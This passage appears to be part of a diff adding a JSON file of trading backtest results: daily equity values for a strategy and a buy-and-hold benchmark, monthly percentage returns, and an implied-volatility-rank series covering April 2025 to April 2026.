+ 10138.077031314046 + ], + [ + "2025-09-11", + 10139.266265400958 + ], + [ + "2025-09-12", + 10140.455638989446 + ], + [ + "2025-09-15", + 10141.645152095873 + ], + [ + "2025-09-16", + 10142.834804736605 + ], + [ + "2025-09-17", + 10144.02459692801 + ], + [ + "2025-09-18", + 10145.214528686458 + ], + [ + "2025-09-19", + 10146.40460002832 + ], + [ + "2025-09-22", + 10147.59481096997 + ], + [ + "2025-09-23", + 10148.785161527783 + ], + [ + "2025-09-24", + 10149.975651718138 + ], + [ + "2025-09-25", + 10151.166281557413 + ], + [ + "2025-09-26", + 10152.35705106199 + ], + [ + "2025-09-29", + 10153.547960248254 + ], + [ + "2025-09-30", + 10154.739009132587 + ], + [ + "2025-10-01", + 10155.930197731377 + ], + [ + "2025-10-02", + 10157.121526061015 + ], + [ + "2025-10-03", + 10158.31299413789 + ], + [ + "2025-10-06", + 10159.504601978395 + ], + [ + "2025-10-07", + 10160.696349598926 + ], + [ + "2025-10-08", + 10161.888237015877 + ], + [ + "2025-10-09", + 10163.08026424565 + ], + [ + "2025-10-10", + 10161.28243130464 + ], + [ + "2025-10-13", + 10204.060294820154 + ], + [ + "2025-10-14", + 10205.257268988928 + ], + [ + "2025-10-15", + 10206.454383567216 + ], + [ + "2025-10-16", + 10207.65163857149 + ], + [ + "2025-10-17", + 10208.849034018222 + ], + [ + "2025-10-20", + 10210.046569923887 + ], + [ + "2025-10-21", + 10211.244246304961 + ], + [ + "2025-10-22", + 10212.442063177923 + ], + [ + "2025-10-23", + 10213.640020559253 + ], + [ + "2025-10-24", + 10214.838118465432 + ], + [ + "2025-10-27", + 10216.036356912946 + ], + [ + "2025-10-28", + 10217.234735918279 + ], + [ + "2025-10-29", + 10218.433255497921 + ], + [ + "2025-10-30", + 10219.63191566836 + ], + [ + "2025-10-31", + 10220.83071644609 + ], + [ + "2025-11-03", + 10222.0296578476 + ], + [ + "2025-11-04", + 10223.228739889393 + ], + [ + "2025-11-05", + 10224.42796258796 + ], + [ + "2025-11-06", + 10222.637325959806 + ], + [ + "2025-11-07", + 10274.976986689195 + ], + [ + "2025-11-10", + 10351.726868661539 + ], + [ + "2025-11-11", + 10352.941164667833 + ], + [ + "2025-11-12", + 10354.155603115558 + ], + [ + "2025-11-13", + 10355.370184021423 + ], + [ + "2025-11-14", + 10356.584907402139 + ], + [ + "2025-11-17", + 10357.799773274419 + ], + [ + "2025-11-18", + 10359.014781654978 + ], + [ + "2025-11-19", + 10360.229932560533 + ], + [ + "2025-11-20", + 10361.445226007801 + ], + [ + "2025-11-21", + 10362.660662013504 + ], + [ + "2025-11-24", + 10363.876240594365 + ], + [ + "2025-11-25", + 10365.091961767108 + ], + [ + "2025-11-26", + 10366.307825548458 + ], + [ + "2025-11-28", + 10367.523831955146 + ], + [ + "2025-12-01", + 10368.739981003902 + ], + [ + "2025-12-02", + 10369.956272711457 + ], + [ + "2025-12-03", + 10371.172707094547 + ], + [ + "2025-12-04", + 10372.389284169907 + ], + [ + "2025-12-05", + 10373.606003954277 + ], + [ + "2025-12-08", + 10374.822866464396 + ], + [ + "2025-12-09", + 10376.039871717006 + ], + [ + "2025-12-10", + 10377.257019728853 + ], + [ + "2025-12-11", + 10378.474310516682 + ], + [ + "2025-12-12", + 10376.701744097241 + ], + [ + "2025-12-15", + 10374.235079534727 + ], + [ + "2025-12-16", + 10392.160964585668 + ], + [ + "2025-12-17", + 10301.318388713982 + ], + [ + "2025-12-18", + 10370.583314778758 + ], + [ + "2025-12-19", + 10436.63965459906 + ], + [ + "2025-12-22", + 10437.863911190496 + ], + [ + "2025-12-23", + 10439.088311391777 + ], + [ + "2025-12-24", + 10440.312855219749 + ], + [ + "2025-12-26", + 10441.53754269126 + ], + [ + "2025-12-29", + 10442.76237382316 + ], + [ + "2025-12-30", + 10443.9873486323 + ], + [ + "2025-12-31", + 10445.212467135534 + ], + [ + "2026-01-02", + 10443.447729349718 + ], + [ + "2026-01-05", + 10468.868680228928 + ], + [ + "2026-01-06", + 10480.676423144942 + ], + [ + "2026-01-07", + 10481.905845412874 + ], + [ + "2026-01-08", + 10483.135411896603 + ], + [ + "2026-01-09", + 10484.365122613048 + ], + [ + "2026-01-12", + 10485.594977579127 + ], + [ + "2026-01-13", + 10486.82497681176 + ], + [ + "2026-01-14", + 10488.055120327872 + ], + [ + "2026-01-15", + 10489.285408144387 + ], + [ + "2026-01-16", + 10490.515840278233 + ], + [ + "2026-01-20", + 10491.746416746337 + ], + [ + "2026-01-21", + 10492.977137565631 + ], + [ + "2026-01-22", + 10494.208002753048 + ], + [ + "2026-01-23", + 10495.439012325522 + ], + [ + "2026-01-26", + 10496.670166299991 + ], + [ + "2026-01-27", + 10497.901464693394 + ], + [ + "2026-01-28", + 10499.132907522671 + ], + [ + "2026-01-29", + 10500.364494804766 + ], + [ + "2026-01-30", + 10501.596226556621 + ], + [ + "2026-02-02", + 10502.828102795187 + ], + [ + "2026-02-03", + 10501.07012353741 + ], + [ + "2026-02-04", + 10422.747413867713 + ], + [ + "2026-02-05", + 10330.79383634496 + ], + [ + "2026-02-06", + 10332.005676828821 + ], + [ + "2026-02-09", + 10333.217659466072 + ], + [ + "2026-02-10", + 10334.429784273387 + ], + [ + "2026-02-11", + 10335.642051267443 + ], + [ + "2026-02-12", + 10336.85446046492 + ], + [ + "2026-02-13", + 10338.067011882498 + ], + [ + "2026-02-17", + 10339.279705536861 + ], + [ + "2026-02-18", + 10340.492541444693 + ], + [ + "2026-02-19", + 10341.705519622683 + ], + [ + "2026-02-20", + 10342.918640087517 + ], + [ + "2026-02-23", + 10344.131902855886 + ], + [ + "2026-02-24", + 10342.355307944485 + ], + [ + "2026-02-25", + 10383.135857675632 + ], + [ + "2026-02-26", + 10352.217235314158 + ], + [ + "2026-02-27", + 10347.611339404451 + ], + [ + "2026-03-02", + 10374.705367902585 + ], + [ + "2026-03-03", + 10342.541668518743 + ], + [ + "2026-03-04", + 10397.151740087987 + ], + [ + "2026-03-05", + 10402.078555963431 + ], + [ + "2026-03-06", + 10403.298758409645 + ], + [ + "2026-03-09", + 10404.519103990135 + ], + [ + "2026-03-10", + 10405.739592721695 + ], + [ + "2026-03-11", + 10406.960224621116 + ], + [ + "2026-03-12", + 10408.180999705191 + ], + [ + "2026-03-13", + 10409.401917990717 + ], + [ + "2026-03-16", + 10410.622979494494 + ], + [ + "2026-03-17", + 10408.854184233318 + ], + [ + "2026-03-18", + 10353.147835393669 + ], + [ + "2026-03-19", + 10346.423670659264 + ], + [ + "2026-03-20", + 10227.658499673802 + ], + [ + "2026-03-23", + 10228.858241999644 + ], + [ + "2026-03-24", + 10230.058125059717 + ], + [ + "2026-03-25", + 10231.25814887053 + ], + [ + "2026-03-26", + 10232.458313448591 + ], + [ + "2026-03-27", + 10233.658618810416 + ], + [ + "2026-03-30", + 10234.859064972516 + ], + [ + "2026-03-31", + 10236.05965195141 + ], + [ + "2026-04-01", + 10237.260379763615 + ], + [ + "2026-04-02", + 10238.46124842565 + ], + [ + "2026-04-06", + 10239.662257954042 + ], + [ + "2026-04-07", + 10237.87340836531 + ], + [ + "2026-04-08", + 10296.585802501711 + ], + [ + "2026-04-09", + 10312.719760269276 + ], + [ + "2026-04-10", + 10313.92948059689 + ], + [ + "2026-04-13", + 10315.13934282919 + ], + [ + "2026-04-14", + 10316.349346982824 + ], + [ + "2026-04-15", + 10317.55949307444 + ], + [ + "2026-04-16", + 10318.769781120685 + ], + [ + "2026-04-17", + 10319.980211138214 + ], + [ + "2026-04-20", + 10321.190783143678 + ], + [ + "2026-04-21", + 10322.401497153734 + ], + [ + "2026-04-22", + 10323.61235318504 + ], + [ + "2026-04-23", + 10324.823351254257 + ] + ], + "benchmark_bh": [ + [ + "2025-04-24", + 10000.0 + ], + [ + "2025-04-25", + 10111.479030508148 + ], + [ + "2025-04-28", + 10108.270443831525 + ], + [ + "2025-04-29", + 10175.02938743881 + ], + [ + "2025-04-30", + 10173.745296615465 + ], + [ + "2025-05-01", + 10306.621466494711 + ], + [ + "2025-05-02", + 10459.612653379794 + ], + [ + "2025-05-05", + 10397.560293050916 + ], + [ + "2025-05-06", + 10300.845354324096 + ], + [ + "2025-05-07", + 10341.285357198045 + ], + [ + "2025-05-08", + 10448.059116733173 + ], + [ + "2025-05-09", + 10441.210851059572 + ], + [ + "2025-05-12", + 10866.588737598304 + ], + [ + "2025-05-13", + 11032.203646174908 + ], + [ + "2025-05-14", + 11098.320216294174 + ], + [ + "2025-05-15", + 11110.516782581508 + ], + [ + "2025-05-16", + 11158.87523617396 + ], + [ + "2025-05-19", + 11169.573149706815 + ], + [ + "2025-05-20", + 11132.343045814878 + ], + [ + "2025-05-21", + 10977.639300396873 + ], + [ + "2025-05-22", + 10998.1814728069 + ], + [ + "2025-05-23", + 10896.330170786705 + ], + [ + "2025-05-27", + 11152.669343988378 + ], + [ + "2025-05-28", + 11103.24004919833 + ], + [ + "2025-05-29", + 11125.066312431698 + ], + [ + "2025-05-30", + 11107.520789377937 + ], + [ + "2025-06-02", + 11195.25102925752 + ], + [ + "2025-06-03", + 11282.764738747883 + ], + [ + "2025-06-04", + 11314.21807431651 + ], + [ + "2025-06-05", + 11229.056016083616 + ], + [ + "2025-06-06", + 11338.82511266962 + ], + [ + "2025-06-09", + 11355.516324915003 + ], + [ + "2025-06-10", + 11430.61956233959 + ], + [ + "2025-06-11", + 11392.103399166226 + ], + [ + "2025-06-12", + 11418.85080760914 + ], + [ + "2025-06-13", + 11275.490629975482 + ], + [ + "2025-06-16", + 11432.330808567123 + ], + [ + "2025-06-17", + 11320.851778058975 + ], + [ + "2025-06-18", + 11318.926626053002 + ], + [ + "2025-06-20", + 11272.707230244965 + ], + [ + "2025-06-23", + 11388.61922835787 + ], + [ + "2025-06-24", + 11562.77396425477 + ], + [ + "2025-06-25", + 11592.333643146763 + ], + [ + "2025-06-26", + 11700.726131379486 + ], + [ + "2025-06-27", + 11740.784253385174 + ], + [ + "2025-06-30", + 11816.829726079215 + ], + [ + "2025-07-01", + 11717.220497816488 + ], + [ + "2025-07-02", + 11798.835394582344 + ], + [ + "2025-07-03", + 11914.937676976684 + ], + [ + "2025-07-07", + 11825.185174492326 + ], + [ + "2025-07-08", + 11831.825439761738 + ], + [ + "2025-07-09", + 11915.582018922787 + ], + [ + "2025-07-10", + 11898.44462284507 + ], + [ + "2025-07-11", + 11871.668343683596 + ], + [ + "2025-07-14", + 11914.72639580902 + ], + [ + "2025-07-15", + 11925.64871356343 + ], + [ + "2025-07-16", + 11937.858402904656 + ], + [ + "2025-07-17", + 12034.469013353035 + ], + [ + "2025-07-18", + 12022.902353652524 + ], + [ + "2025-07-21", + 12085.23817194547 + ], + [ + "2025-07-22", + 12022.688447874081 + ], + [ + "2025-07-23", + 12077.527065478462 + ], + [ + "2025-07-24", + 12103.231191136952 + ], + [ + "2025-07-25", + 12132.364370777452 + ], + [ + "2025-07-28", + 12170.280810387947 + ], + [ + "2025-07-29", + 12151.43085577731 + ], + [ + "2025-07-30", + 12167.710004130482 + ], + [ + "2025-07-31", + 12103.231191136952 + ], + [ + "2025-08-01", + 11864.814172635743 + ], + [ + "2025-08-04", + 12083.7382068856 + ], + [ + "2025-08-05", + 12001.695498562862 + ], + [ + "2025-08-06", + 12152.715602753347 + ], + [ + "2025-08-07", + 12193.843253651245 + ], + [ + "2025-08-08", + 12307.591260177338 + ], + [ + "2025-08-11", + 12271.174785626712 + ], + [ + "2025-08-12", + 12425.4061011046 + ], + [ + "2025-08-13", + 12431.619867122517 + ], + [ + "2025-08-14", + 12421.982296344147 + ], + [ + "2025-08-15", + 12367.356272212819 + ], + [ + "2025-08-18", + 12362.42856547633 + ], + [ + "2025-08-19", + 12194.7001890704 + ], + [ + "2025-08-20", + 12122.29767613681 + ], + [ + "2025-08-21", + 12066.174311556391 + ], + [ + "2025-08-22", + 12252.323518710686 + ], + [ + "2025-08-25", + 12216.979197663046 + ], + [ + "2025-08-26", + 12266.03317311178 + ], + [ + "2025-08-27", + 12284.885752333197 + ], + [ + "2025-08-28", + 12361.788160446395 + ], + [ + "2025-08-29", + 12218.693068501358 + ], + [ + "2025-09-02", + 12116.300440508112 + ], + [ + "2025-09-03", + 12211.623679369673 + ], + [ + "2025-09-04", + 12322.15784999759 + ], + [ + "2025-09-05", + 12339.93696341063 + ], + [ + "2025-09-08", + 12400.131099308383 + ], + [ + "2025-09-09", + 12435.26282688297 + ], + [ + "2025-09-10", + 12439.332285894916 + ], + [ + "2025-09-11", + 12511.734798828506 + ], + [ + "2025-09-12", + 12567.001227989767 + ], + [ + "2025-09-15", + 12674.536780803335 + ], + [ + "2025-09-16", + 12663.827056521977 + ], + [ + "2025-09-17", + 12638.549430114981 + ], + [ + "2025-09-18", + 12752.511342419517 + ], + [ + "2025-09-19", + 12838.837415532644 + ], + [ + "2025-09-22", + 12914.843519065009 + ], + [ + "2025-09-23", + 12829.059428077628 + ], + [ + "2025-09-24", + 12784.02241942527 + ], + [ + "2025-09-25", + 12728.906905383767 + ], + [ + "2025-09-26", + 12781.233770473194 + ], + [ + "2025-09-29", + 12840.42530505359 + ], + [ + "2025-09-30", + 12875.597714095242 + ], + [ + "2025-10-01", + 12937.361367238493 + ], + [ + "2025-10-02", + 12990.547792357855 + ], + [ + "2025-10-03", + 12935.861402178623 + ], + [ + "2025-10-06", + 13033.011370141969 + ], + [ + "2025-10-07", + 12964.38435981314 + ], + [ + "2025-10-08", + 13113.006882057538 + ], + [ + "2025-10-09", + 13097.135860680411 + ], + [ + "2025-10-10", + 12642.47847245028 + ], + [ + "2025-10-13", + 12910.768810831507 + ], + [ + "2025-10-14", + 12824.769501760293 + ], + [ + "2025-10-15", + 12915.271330621892 + ], + [ + "2025-10-16", + 12867.44698532285 + ], + [ + "2025-10-17", + 12951.945017028804 + ], + [ + "2025-10-20", + 13115.148564452731 + ], + [ + "2025-10-21", + 13111.71951047072 + ], + [ + "2025-10-22", + 12985.400930621367 + ], + [ + "2025-10-23", + 13094.562429812166 + ], + [ + "2025-10-24", + 13234.389881338066 + ], + [ + "2025-10-27", + 13470.083866156661 + ], + [ + "2025-10-28", + 13573.66806744331 + ], + [ + "2025-10-29", + 13634.790003251237 + ], + [ + "2025-10-30", + 13426.332916785732 + ], + [ + "2025-10-31", + 13491.100436964887 + ], + [ + "2025-11-03", + 13555.652739060211 + ], + [ + "2025-11-04", + 13280.500355798798 + ], + [ + "2025-11-05", + 13366.928788732284 + ], + [ + "2025-11-06", + 13117.938525710195 + ], + [ + "2025-11-07", + 13076.547101429067 + ], + [ + "2025-11-10", + 13365.855322923908 + ], + [ + "2025-11-11", + 13330.255102325373 + ], + [ + "2025-11-12", + 13319.746160768565 + ], + [ + "2025-11-13", + 13047.810238016109 + ], + [ + "2025-11-14", + 13057.674837626813 + ], + [ + "2025-11-17", + 12946.155125651601 + ], + [ + "2025-11-18", + 12788.526251521043 + ], + [ + "2025-11-19", + 12864.874866759994 + ], + [ + "2025-11-20", + 12560.33996583413 + ], + [ + "2025-11-21", + 12654.702597150788 + ], + [ + "2025-11-24", + 12978.323667657349 + ], + [ + "2025-11-25", + 13058.317867267528 + ], + [ + "2025-11-26", + 13173.6983816978 + ], + [ + "2025-11-28", + 13280.500355798798 + ], + [ + "2025-12-01", + 13235.891158703324 + ], + [ + "2025-12-02", + 13339.476672295363 + ], + [ + "2025-12-03", + 13372.075650468772 + ], + [ + "2025-12-04", + 13359.636307684434 + ], + [ + "2025-12-05", + 13414.108792085224 + ], + [ + "2025-12-08", + 13388.374483402782 + ], + [ + "2025-12-09", + 13404.887222115232 + ], + [ + "2025-12-10", + 13459.788830378295 + ], + [ + "2025-12-11", + 13416.254411396585 + ], + [ + "2025-12-12", + 13159.759073853595 + ], + [ + "2025-12-15", + 13093.704182087622 + ], + [ + "2025-12-16", + 13119.653708853895 + ], + [ + "2025-12-17", + 12876.454649514399 + ], + [ + "2025-12-18", + 13063.036917447133 + ], + [ + "2025-12-19", + 13233.31772783508 + ], + [ + "2025-12-22", + 13296.751945738797 + ], + [ + "2025-12-23", + 13359.024773373061 + ], + [ + "2025-12-24", + 13398.107852474564 + ], + [ + "2025-12-26", + 13397.248292444632 + ], + [ + "2025-12-29", + 13332.398097025954 + ], + [ + "2025-12-30", + 13301.47493283457 + ], + [ + "2025-12-31", + 13191.52998732641 + ], + [ + "2026-01-02", + 13165.97677678768 + ], + [ + "2026-01-05", + 13270.553080948574 + ], + [ + "2026-01-06", + 13387.155351696203 + ], + [ + "2026-01-07", + 13400.040878312873 + ], + [ + "2026-01-08", + 13323.807745948176 + ], + [ + "2026-01-09", + 13456.515940737601 + ], + [ + "2026-01-12", + 13467.682347294403 + ], + [ + "2026-01-13", + 13447.71168388138 + ], + [ + "2026-01-14", + 13304.052300618981 + ], + [ + "2026-01-15", + 13351.939636576708 + ], + [ + "2026-01-16", + 13340.773230019904 + ], + [ + "2026-01-20", + 13057.319202866338 + ], + [ + "2026-01-21", + 13233.83346385304 + ], + [ + "2026-01-22", + 13330.035947325374 + ], + [ + "2026-01-23", + 13372.124205768172 + ], + [ + "2026-01-26", + 13430.96273019887 + ], + [ + "2026-01-27", + 13552.718424209936 + ], + [ + "2026-01-28", + 13597.597956215586 + ], + [ + "2026-01-29", + 13516.212712892842 + ], + [ + "2026-01-30", + 13353.871350109626 + ], + [ + "2026-02-02", + 13445.564752264629 + ], + [ + "2026-02-03", + 13238.986887116474 + ], + [ + "2026-02-04", + 13007.715371459522 + ], + [ + "2026-02-05", + 12820.46514008368 + ], + [ + "2026-02-06", + 13091.462764482849 + ], + [ + "2026-02-09", + 13191.745205410241 + ], + [ + "2026-02-10", + 13130.544531278963 + ], + [ + "2026-02-11", + 13165.761558703849 + ], + [ + "2026-02-12", + 12897.984331729805 + ], + [ + "2026-02-13", + 12925.470568106844 + ], + [ + "2026-02-17", + 12912.155917627902 + ], + [ + "2026-02-18", + 13008.573619184068 + ], + [ + "2026-02-19", + 12958.754569693423 + ], + [ + "2026-02-20", + 13073.425126908132 + ], + [ + "2026-02-23", + 12914.518067328485 + ], + [ + "2026-02-24", + 13053.239245411278 + ], + [ + "2026-02-25", + 13242.422502625432 + ], + [ + "2026-02-26", + 13082.658507626627 + ], + [ + "2026-02-27", + 13040.78415496227 + ], + [ + "2026-03-02", + 13057.96354481244 + ], + [ + "2026-03-03", + 12918.17021322666 + ], + [ + "2026-03-04", + 13115.084261488659 + ], + [ + "2026-03-05", + 13075.570746219495 + ], + [ + "2026-03-06", + 12878.871916041326 + ], + [ + "2026-03-09", + 13050.877095710697 + ], + [ + "2026-03-10", + 13051.092313794528 + ], + [ + "2026-03-11", + 13049.374506040049 + ], + [ + "2026-03-12", + 12825.403345263283 + ], + [ + "2026-03-13", + 12749.385430982415 + ], + [ + "2026-03-16", + 12892.40047229871 + ], + [ + "2026-03-17", + 12955.318954184466 + ], + [ + "2026-03-18", + 12774.726048048093 + ], + [ + "2026-03-19", + 12734.354285054384 + ], + [ + "2026-03-20", + 12499.001499636983 + ], + [ + "2026-03-23", + 12642.477160144892 + ], + [ + "2026-03-24", + 12556.04347798985 + ], + [ + "2026-03-25", + 12638.607171552107 + ], + [ + "2026-03-26", + 12336.950156344783 + ], + [ + "2026-03-27", + 12095.926899340599 + ], + [ + "2026-03-30", + 12003.473672365244 + ], + [ + "2026-03-31", + 12409.838222272381 + ], + [ + "2026-04-01", + 12563.139113229317 + ], + [ + "2026-04-02", + 12577.544289486696 + ], + [ + "2026-04-06", + 12653.227565893314 + ], + [ + "2026-04-07", + 12655.163216342402 + ], + [ + "2026-04-08", + 13031.42741753719 + ], + [ + "2026-04-09", + 13119.580219752099 + ], + [ + "2026-04-10", + 13138.501038853754 + ], + [ + "2026-04-13", + 13274.38632499046 + ], + [ + "2026-04-14", + 13515.409581994645 + ], + [ + "2026-04-15", + 13704.617773011192 + ], + [ + "2026-04-16", + 13770.624109477765 + ], + [ + "2026-04-17", + 13950.801014805758 + ], + [ + "2026-04-20", + 13906.509395614472 + ], + [ + "2026-04-21", + 13853.618239207683 + ], + [ + "2026-04-22", + 14085.39630474487 + ], + [ + "2026-04-23", + 14006.058257829296 + ] + ], + "monthly_pct": [ + [ + "2025-05-31", + 0.24662697723032423 + ], + [ + "2025-06-30", + 0.2348690548344079 + ], + [ + "2025-07-31", + 0.2583862788740676 + ], + [ + "2025-08-31", + 0.49280859986950976 + ], + [ + "2025-09-30", + 0.2466269772302354 + ], + [ + "2025-10-31", + 0.6508459474346306 + ], + [ + "2025-11-30", + 1.4352367197806748 + ], + [ + "2025-12-31", + 0.7493460969043797 + ], + [ + "2026-01-31", + 0.5398048110413445 + ], + [ + "2026-02-28", + -1.4662998255709936 + ], + [ + "2026-03-31", + -1.0780428815319487 + ], + [ + "2026-04-30", + 0.867166686410692 + ] + ], + "ivr": [ + [ + "2025-04-24", + 50.0 + ], + [ + "2025-04-25", + 50.0 + ], + [ + "2025-04-28", + 50.0 + ], + [ + "2025-04-29", + 50.0 + ], + [ + "2025-04-30", + 50.0 + ], + [ + "2025-05-01", + 50.0 + ], + [ + "2025-05-02", + 50.0 + ], + [ + "2025-05-05", + 50.0 + ], + [ + "2025-05-06", + 50.0 + ], + [ + "2025-05-07", + 50.0 + ], + [ + "2025-05-08", + 50.0 + ], + [ + "2025-05-09", + 50.0 + ], + [ + "2025-05-12", + 50.0 + ], + [ + "2025-05-13", + 50.0 + ], + [ + "2025-05-14", + 50.0 + ], + [ + "2025-05-15", + 50.0 + ], + [ + "2025-05-16", + 50.0 + ], + [ + "2025-05-19", + 50.0 + ], + [ + "2025-05-20", + 50.0 + ], + [ + "2025-05-21", + 50.0 + ], + [ + "2025-05-22", + 50.0 + ], + [ + "2025-05-23", + 100.0 + ], + [ + "2025-05-27", + 100.0 + ], + [ + "2025-05-28", + 100.0 + ], + [ + "2025-05-29", + 98.13557556110116 + ], + [ + "2025-05-30", + 94.47716344971242 + ], + [ + "2025-06-02", + 72.10842626200099 + ], + [ + "2025-06-03", + 59.35990365236516 + ], + [ + "2025-06-04", + 25.530301696268726 + ], + [ + "2025-06-05", + 51.9589995223919 + ], + [ + "2025-06-06", + 51.115987648452155 + ], + [ + "2025-06-09", + 48.085963861934836 + ], + [ + "2025-06-10", + 0.0 + ], + [ + "2025-06-11", + 0.0 + ], + [ + "2025-06-12", + 0.0 + ], + [ + "2025-06-13", + 12.5695109221408 + ], + [ + "2025-06-16", + 22.304317156625896 + ], + [ + "2025-06-17", + 29.316853999059077 + ], + [ + "2025-06-18", + 28.357643737258176 + ], + [ + "2025-06-20", + 16.536139932915233 + ], + [ + "2025-06-23", + 21.638233869090254 + ], + [ + "2025-06-24", + 23.33651306604595 + ], + [ + "2025-06-25", + 0.0 + ], + [ + "2025-06-26", + 0.512291696754797 + ], + [ + "2025-06-27", + 0.49265622933211495 + ], + [ + "2025-06-30", + 0.017746999177269955 + ], + [ + "2025-07-01", + 6.550041323325159 + ], + [ + "2025-07-02", + 5.781827235565623 + ], + [ + "2025-07-03", + 9.058620023379556 + ], + [ + "2025-07-07", + 8.619684695924867 + ], + [ + "2025-07-08", + 5.320496745358989 + ], + [ + "2025-07-09", + 6.80073062078444 + ], + [ + "2025-07-10", + 6.409622562077352 + ], + [ + "2025-07-11", + 5.828094946813735 + ], + [ + "2025-07-14", + 5.991882064639496 + ], + [ + "2025-07-15", + 0.0 + ], + [ + "2025-07-16", + 0.0 + ], + [ + "2025-07-17", + 0.0 + ], + [ + "2025-07-18", + 0.3412485860108554 + ], + [ + "2025-07-21", + 0.0 + ], + [ + "2025-07-22", + 0.8131619460033294 + ], + [ + "2025-07-23", + 0.0 + ], + [ + "2025-07-24", + 0.0 + ], + [ + "2025-07-25", + 0.0 + ], + [ + "2025-07-28", + 0.0 + ], + [ + "2025-07-29", + 0.0 + ], + [ + "2025-07-30", + 0.0 + ], + [ + "2025-07-31", + 1.5541595495152165 + ], + [ + "2025-08-01", + 21.815232840623157 + ], + [ + "2025-08-04", + 34.32354218113217 + ], + [ + "2025-08-05", + 36.9207023886342 + ], + [ + "2025-08-06", + 41.10073261143838 + ], + [ + "2025-08-07", + 41.07131740034484 + ], + [ + "2025-08-08", + 42.78569702836037 + ], + [ + "2025-08-11", + 43.42397089400042 + ], + [ + "2025-08-12", + 47.842419466514016 + ], + [ + "2025-08-13", + 47.88427842253519 + ], + [ + "2025-08-14", + 46.733164485576445 + ], + [ + "2025-08-15", + 47.92635868256638 + ], + [ + "2025-08-18", + 47.438941802106 + ], + [ + "2025-08-19", + 53.85171801079378 + ], + [ + "2025-08-20", + 54.75498127893788 + ], + [ + "2025-08-21", + 55.30976887636223 + ], + [ + "2025-08-22", + 62.86953754689435 + ], + [ + "2025-08-25", + 62.89926723254615 + ], + [ + "2025-08-26", + 63.2391437783462 + ], + [ + "2025-08-27", + 63.26163159729644 + ], + [ + "2025-08-28", + 62.96920537565869 + ], + [ + "2025-08-29", + 53.45412423781368 + ], + [ + "2025-09-02", + 44.98076509069125 + ], + [ + "2025-09-03", + 45.01597832987404 + ], + [ + "2025-09-04", + 42.24184642908153 + ], + [ + "2025-09-05", + 41.92390561144122 + ], + [ + "2025-09-08", + 39.64863390655109 + ], + [ + "2025-09-09", + 39.41100166180461 + ], + [ + "2025-09-10", + 33.10252075986724 + ], + [ + "2025-09-11", + 34.46200444355618 + ], + [ + "2025-09-12", + 35.04091159202496 + ], + [ + "2025-09-15", + 36.326645668419445 + ], + [ + "2025-09-16", + 36.39993324399353 + ], + [ + "2025-09-17", + 26.677398939330306 + ], + [ + "2025-09-18", + 25.809996095525577 + ], + [ + "2025-09-19", + 23.88963305241953 + ], + [ + "2025-09-22", + 16.362369381160203 + ], + [ + "2025-09-23", + 19.377816965686982 + ], + [ + "2025-09-24", + 20.952682463144185 + ], + [ + "2025-09-25", + 22.98315564855534 + ], + [ + "2025-09-26", + 22.247842324906333 + ], + [ + "2025-09-29", + 11.761581007945308 + ], + [ + "2025-09-30", + 3.791067598295676 + ], + [ + "2025-10-01", + 2.343210992561235 + ], + [ + "2025-10-02", + 0.0 + ], + [ + "2025-10-03", + 3.2993842447199766 + ], + [ + "2025-10-06", + 4.703853462586793 + ], + [ + "2025-10-07", + 8.434786341937553 + ], + [ + "2025-10-08", + 13.229906818736655 + ], + [ + "2025-10-09", + 13.392937761138413 + ], + [ + "2025-10-10", + 67.23153091643833 + ], + [ + "2025-10-13", + 78.29161958878065 + ], + [ + "2025-10-14", + 79.84519552441456 + ], + [ + "2025-10-15", + 80.65720815807339 + ], + [ + "2025-10-16", + 79.22437477252147 + ], + [ + "2025-10-17", + 79.1301319866313 + ], + [ + "2025-10-20", + 82.50052036939618 + ], + [ + "2025-10-21", + 80.90842760898475 + ], + [ + "2025-10-22", + 83.57795111702094 + ], + [ + "2025-10-23", + 84.23783343036146 + ], + [ + "2025-10-24", + 86.25637056018547 + ], + [ + "2025-10-27", + 92.74004831077379 + ], + [ + "2025-10-28", + 93.44049446223494 + ], + [ + "2025-10-29", + 93.39506653019552 + ], + [ + "2025-10-30", + 100.0 + ], + [ + "2025-10-31", + 99.21397984665097 + ], + [ + "2025-11-03", + 98.6365220392025 + ], + [ + "2025-11-04", + 100.0 + ], + [ + "2025-11-05", + 98.37477115717193 + ], + [ + "2025-11-06", + 100.0 + ], + [ + "2025-11-07", + 73.03465611764204 + ], + [ + "2025-11-10", + 73.67989932744368 + ], + [ + "2025-11-11", + 72.42922461430203 + ], + [ + "2025-11-12", + 71.92524041388666 + ], + [ + "2025-11-13", + 82.18136975705235 + ], + [ + "2025-11-14", + 81.42459363082574 + ], + [ + "2025-11-17", + 79.38442521202983 + ], + [ + "2025-11-18", + 82.09644462406996 + ], + [ + "2025-11-19", + 81.32377687427578 + ], + [ + "2025-11-20", + 90.16708398233213 + ], + [ + "2025-11-21", + 88.78153316276341 + ], + [ + "2025-11-24", + 96.0741300535765 + ], + [ + "2025-11-25", + 95.5327755965267 + ], + [ + "2025-11-26", + 97.01321171422036 + ], + [ + "2025-11-28", + 94.51668120965101 + ], + [ + "2025-12-01", + 93.9917759700868 + ], + [ + "2025-12-02", + 94.88583553838154 + ], + [ + "2025-12-03", + 86.68114021619803 + ], + [ + "2025-12-04", + 85.83581509963244 + ], + [ + "2025-12-05", + 77.9757270761659 + ], + [ + "2025-12-08", + 77.73359314860431 + ], + [ + "2025-12-09", + 66.92526636081371 + ], + [ + "2025-12-10", + 67.02432840101596 + ], + [ + "2025-12-11", + 67.30668031053025 + ], + [ + "2025-12-12", + 66.23807704210607 + ], + [ + "2025-12-15", + 66.92842188929357 + ], + [ + "2025-12-16", + 65.00204295916477 + ], + [ + "2025-12-17", + 70.20681193519087 + ], + [ + "2025-12-18", + 74.09111099121641 + ], + [ + "2025-12-19", + 61.22145170135161 + ], + [ + "2025-12-22", + 60.68972650389771 + ], + [ + "2025-12-23", + 45.162890581595576 + ], + [ + "2025-12-24", + 44.497988392379746 + ], + [ + "2025-12-26", + 42.628425277102025 + ], + [ + "2025-12-29", + 42.0235891167814 + ], + [ + "2025-12-30", + 41.912387337270026 + ], + [ + "2025-12-31", + 42.05283989598277 + ], + [ + "2026-01-02", + 41.81212944443908 + ], + [ + "2026-01-05", + 44.195446592975266 + ], + [ + "2026-01-06", + 46.23617835016234 + ], + [ + "2026-01-07", + 46.15609870110713 + ], + [ + "2026-01-08", + 47.08320329786892 + ], + [ + "2026-01-09", + 49.5533614091616 + ], + [ + "2026-01-12", + 49.27502610712789 + ], + [ + "2026-01-13", + 36.524735533216806 + ], + [ + "2026-01-14", + 39.79256154307668 + ], + [ + "2026-01-15", + 39.97823030471416 + ], + [ + "2026-01-16", + 25.961054119501892 + ], + [ + "2026-01-20", + 36.70086344452657 + ], 